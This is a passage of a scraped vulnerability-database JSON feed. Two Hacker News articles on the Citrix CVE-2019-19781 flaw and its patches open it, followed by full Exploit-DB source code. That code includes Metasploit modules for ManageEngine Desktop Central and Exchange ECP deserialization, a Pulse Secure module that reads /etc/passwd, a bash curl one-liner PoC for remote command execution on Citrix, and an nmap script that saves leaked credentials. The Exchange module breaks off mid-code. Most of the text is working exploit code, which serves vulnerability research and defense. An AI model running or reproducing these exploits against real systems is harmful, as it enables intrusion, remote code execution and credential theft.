<https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. \n\n\n[](<https://1.bp.blogspot.com/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n\n\n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. \n \n**UPDATE \u2014 **Citrix on Thursday also released [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "modified": "2020-01-24T07:05:37", "published": "2020-01-20T14:24:00", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-11T13:18:47", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the last Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n\n\n \nCitrix confirmed that the flaw affects all supported version of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclose without releasing any security patches for vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2060\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. \n \n\n\n \nThrough the cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week when hackers developed private exploit after reverse engineering mitigation information, the public release of weaponized PoC would now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n\n\n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 Citrix ADC or Gateway servers publicly accessible and can be exploited overnight if not taken offline or protected using available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSsec also released a video demonstration of the exploit they developed but chose not to release it at this moment. \n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "modified": "2020-01-11T10:22:37", "published": "2020-01-11T10:21:00", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2020-03-17T13:43:10", "bulletinFamily": "exploit", "description": "", "modified": "2020-03-17T00:00:00", "published": "2020-03-17T00:00:00", "id": "EDB-ID:48224", "href": "https://www.exploit-db.com/exploits/48224", "type": "exploitdb", "title": "ManageEngine Desktop Central - Java Deserialization (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\r\n 'Description' => %q{\r\n This module exploits a Java deserialization vulnerability in the\r\n getChartImage() method from the FileStorage class within ManageEngine\r\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\r\n\r\n \"The short-term fix for the arbitrary file upload vulnerability was\r\n released in build 10.0.474 on January 20, 2020. In continuation of that,\r\n the complete fix for the remote code execution vulnerability is now\r\n available in build 10.0.479.\"\r\n },\r\n 'Author' => [\r\n 'mr_me', # Discovery and exploit\r\n 'wvu' # Module\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-10189'],\r\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\r\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\r\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\r\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\r\n ],\r\n 'DisclosureDate' => '2020-03-05', # 0day release\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'windows',\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n ['Windows Command',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :win_cmd\r\n ],\r\n ['Windows Dropper',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :win_dropper\r\n ],\r\n ['PowerShell Stager',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :psh_stager\r\n ]\r\n ],\r\n 'DefaultTarget' => 2,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 8383,\r\n 'SSL' => true,\r\n 'WfsDelay' => 60 # It can take a little while to trigger\r\n },\r\n 'CmdStagerFlavor' => 'certutil', # This works without issue\r\n 'Notes' => {\r\n 'PatchedVersion' => Gem::Version.new('100474'),\r\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\r\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\r\n )\r\n\r\n unless res\r\n return CheckCode::Unknown('Target is not responding to check')\r\n end\r\n\r\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\r\n return CheckCode::Unknown('Target is not running Desktop Central')\r\n end\r\n\r\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\r\n\r\n unless version\r\n return CheckCode::Detected('Could not detect Desktop Central version')\r\n end\r\n\r\n vprint_status(\"Detected Desktop Central version #{version}\")\r\n\r\n if Gem::Version.new(version) < notes['PatchedVersion']\r\n return CheckCode::Appears(\"#{version} is an exploitable version\")\r\n end\r\n\r\n CheckCode::Safe(\"#{version} is not an exploitable version\")\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\r\n\r\n case target['Type']\r\n when :win_cmd\r\n execute_command(payload.encoded)\r\n when :win_dropper\r\n execute_cmdstager\r\n when :psh_stager\r\n execute_command(cmd_psh_payload(\r\n payload.encoded,\r\n payload.arch.first,\r\n remove_comspec: true\r\n ))\r\n end\r\n end\r\n\r\n def execute_command(cmd, _opts = {})\r\n # XXX: An executable is required to run arbitrary commands\r\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\r\n\r\n vprint_status(\"Serializing command: #{cmd}\")\r\n\r\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\r\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\r\n 'CommonsBeanutils1',\r\n cmd\r\n )\r\n\r\n # XXX: Patch in expected serialVersionUID\r\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\r\n\r\n # Rock 'n' roll!\r\n upload_serialized_payload(serialized_payload)\r\n deserialize_payload\r\n end\r\n\r\n def upload_serialized_payload(serialized_payload)\r\n print_status('Uploading serialized payload')\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,\r\n '/mdm/client/v1/mdmLogUploader'),\r\n 'ctype' => 'application/octet-stream',\r\n 'vars_get' => {\r\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\r\n 'filename' => 'logger.zip'\r\n },\r\n 'data' => serialized_payload\r\n )\r\n\r\n unless res && res.code == 200\r\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\r\n end\r\n\r\n print_good('Successfully uploaded serialized payload')\r\n\r\n # C:\\Program Files\\DesktopCentral_Server\\bin\r\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\r\n end\r\n\r\n def deserialize_payload\r\n print_status('Deserializing payload')\r\n\r\n res = send_request_cgi(\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\r\n 'vars_get' => {'img' => '\\\\logger.zip'}\r\n )\r\n\r\n unless res && res.code == 200\r\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\r\n end\r\n\r\n print_good('Successfully deserialized payload')\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48224"}, {"lastseen": "2019-08-21T09:35:48", "bulletinFamily": "exploit", "description": "", "modified": "2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "EDB-ID:47297", "href": "https://www.exploit-db.com/exploits/47297", "type": "exploitdb", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (metasploit)", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Date: 8/20/2019\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47297"}, {"lastseen": "2020-01-11T01:26:19", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-11T00:00:00", "published": "2020-01-11T00:00:00", "id": "EDB-ID:47901", "href": "https://www.exploit-db.com/exploits/47901", "type": "exploitdb", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "sourceData": "#!/bin/bash\r\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\r\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\r\n# Release Date : 11/01/2020\r\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\r\necho \"=================================================================================\r\n ___ _ _ ____ ___ _ _\r\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\r\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\r\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\r\n |__/ CVE-2019-19781\r\n=================================================================================\"\r\n##############################\r\nif [ -z \"$1\" ];\r\nthen\r\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\r\nexit;\r\nfi\r\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\r\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\r\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\r\necho -ne \"Command Output :\\n\"\r\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47901"}, {"lastseen": "2020-01-16T11:26:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-01-16T00:00:00", "published": "2020-01-16T00:00:00", "id": "EDB-ID:47930", "href": "https://www.exploit-db.com/exploits/47930", "type": "exploitdb", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\r\n# Date: 2019-12-17\r\n# CVE: CVE-2019-19781\r\n# Vulenrability: Path Traversal\r\n# Vulnerablity Discovery: Mikhail Klyuchnikov\r\n# Exploit Author: Dhiraj Mishra\r\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\r\n# Vendor Homepage: https://www.citrix.com/\r\n# References: https://support.citrix.com/article/CTX267027\r\n# https://github.com/nmap/nmap/pull/1893\r\n\r\nlocal http = require \"http\"\r\nlocal stdnse = require \"stdnse\"\r\nlocal shortport = require \"shortport\"\r\nlocal table = require \"table\"\r\nlocal string = require \"string\"\r\nlocal vulns = require \"vulns\"\r\nlocal nmap = require \"nmap\"\r\nlocal io = require \"io\"\r\n\r\ndescription = [[\r\nThis NSE script checks whether the traget server is vulnerable to\r\nCVE-2019-19781\r\n]]\r\n---\r\n-- @usage\r\n-- nmap --script https-citrix-path-traversal -p <port> <host>\r\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\r\noutput='file.txt'\r\n-- @output\r\n-- PORT STATE SERVICE\r\n-- 443/tcp open http\r\n-- | CVE-2019-19781:\r\n-- | Host is vulnerable to CVE-2019-19781\r\n-- @changelog\r\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\r\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\r\n-- @xmloutput\r\n-- <table key=\"NMAP-1\">\r\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\r\n-- <elem key=\"state\">VULNERABLE</elem>\r\n-- <table key=\"description\">\r\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\r\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\r\n-- traversal vulnerability that allows attackers to read configurations or\r\nany other file.\r\n-- </table>\r\n-- <table key=\"dates\">\r\n-- <table key=\"disclosure\">\r\n-- <elem key=\"year\">2019</elem>\r\n-- <elem key=\"day\">17</elem>\r\n-- <elem key=\"month\">12</elem>\r\n-- </table>\r\n-- </table>\r\n-- <elem key=\"disclosure\">17-12-2019</elem>\r\n-- <table key=\"extra_info\">\r\n-- </table>\r\n-- <table key=\"refs\">\r\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\r\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\r\n-- </table>\r\n-- </table>\r\n\r\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\r\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\r\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\r\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\r\n\r\nportrule = shortport.ssl\r\n\r\naction = function(host,port)\r\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\r\n local vuln = {\r\n title = 'Citrix ADC Path Traversal',\r\n state = vulns.STATE.NOT_VULN,\r\n description = [[\r\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\r\n12.1, and 13.0 are vulnerable\r\nto a unauthenticated path traversal vulnerability that allows attackers to\r\nread configurations or any other file.\r\n ]],\r\n references = {\r\n 'https://support.citrix.com/article/CTX267027',\r\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\r\n },\r\n dates = {\r\n disclosure = {year = '2019', month = '12', day = '17'},\r\n },\r\n }\r\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\r\n local path = \"/vpn/../vpns/cfg/smb.conf\"\r\n local response\r\n local output = {}\r\n local success = \"Host is vulnerable to CVE-2019-19781\"\r\n local fail = \"Host is not vulnerable\"\r\n local match = \"[global]\"\r\n local credentials\r\n local citrixADC\r\n response = http.get(host, port.number, path)\r\n\r\n if not response.status then\r\n stdnse.print_debug(\"Request Failed\")\r\n return\r\n end\r\n if response.status == 200 then\r\n if string.match(response.body, match) then\r\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\r\nSCRIPT_NAME,host.targetname or host.ip, path)\r\n vuln.state = vulns.STATE.VULN\r\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\r\nor host.ip,port.number, path))\r\n if outputFile then\r\n credentials = response.body:gsub('%W','.')\r\nvuln.check_results = stdnse.format_output(true, citrixADC)\r\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\r\nstored in the output file\")\r\nfile = io.open(outputFile, \"a\")\r\nfile:write(credentials, \"\\n\")\r\n else\r\n vuln.check_results = stdnse.format_output(true, citrixADC)\r\n end\r\n end\r\n elseif response.status == 403 then\r\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\r\nor host.ip, path, response.status)\r\n vuln.state = vulns.STATE.NOT_VULN\r\n end\r\n\r\n return vuln_report:make_output(vuln)\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47930"}, {"lastseen": "2020-03-05T13:38:14", "bulletinFamily": "exploit", "description": "", "modified": "2020-03-05T00:00:00", "published": "2020-03-05T00:00:00", "id": "EDB-ID:48168", "href": "https://www.exploit-db.com/exploits/48168", "type": "exploitdb", "title": "Exchange Control Panel - Viewstate Deserialization (Metasploit)", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'bindata'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n # include Msf::Auxiliary::Report\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\r\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exchange Control Panel Viewstate Deserialization',\r\n 'Description' => %q{\r\n This module exploits a .NET serialization vulnerability in the\r\n Exchange Control Panel (ECP) web page. The vulnerability is due to\r\n Microsoft Exchange Server not randomizing the keys on a\r\n per-installation basis resulting in them using the same validationKey\r\n and decryptionKey values. With knowledge of these, values an attacker\r\n can craft a special viewstate to cause an OS command to be executed\r\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\r\n },\r\n 'Author' => 'Spencer McIntyre',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0688'],\r\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => '2020-02-11',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_SAFE, ],\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\r\n 'Reliability' => [ REPEATABLE_SESSION, ],\r\n }\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\r\n ])\r\n end\r\n\r\n def check\r\n state = get_request_setup\r\n viewstate = state[:viewstate]\r\n return CheckCode::Unknown if viewstate.nil?\r\n\r\n viewstate = Rex::Text.decode_base64(viewstate)\r\n body = viewstate[0...-20]\r\n signature = viewstate[-20..-1]\r\n\r\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\r\n return CheckCode::Safe\r\n end\r\n\r\n # we've validated the signature matches based on the data we have and thus\r\n # proven that we are capable of signing a viewstate ourselves\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def generate_viewstate(generator, session_id, cmd)\r\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\r\n signature = generate_viewstate_signature(generator, session_id, viewstate)\r\n Rex::Text.encode_base64(viewstate + signature)\r\n end\r\n\r\n def generate_viewstate_signature(generator, session_id, viewstate)\r\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\r\n mac_key_bytes << Rex::Text.to_unicode(session_id)\r\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\r\n end\r\n\r\n def exploit\r\n state = get_request_setup\r\n\r\n # the major limit is the max length of a GET request, the command will be\r\n # XML escaped and then base64 encoded which both increase the size\r\n if target.arch.first == ARCH_CMD\r\n execute_command(payload.encoded, opts={state: state})\r\n else\r\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n state = opts[:state]\r\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\r\n 5.times do |iteration|\r\n # this request *must* be a GET request, can't use POST to use a larger viewstate\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => state[:cookies].join(''),\r\n 'agent' => state[:user_agent],\r\n 'vars_get' => {\r\n '__VIEWSTATE' => viewstate,\r\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\r\n }\r\n })\r\n break\r\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\r\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\r\n sleep iteration\r\n end\r\n end\r\n\r\n def get_request_setup\r\n # need to use a newer default user-agent than what Metasploit currently provides\r\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\r\n 'method' => 'POST',\r\n 'agent' => user_agent,\r\n 'vars_post' => {\r\n 'password' => 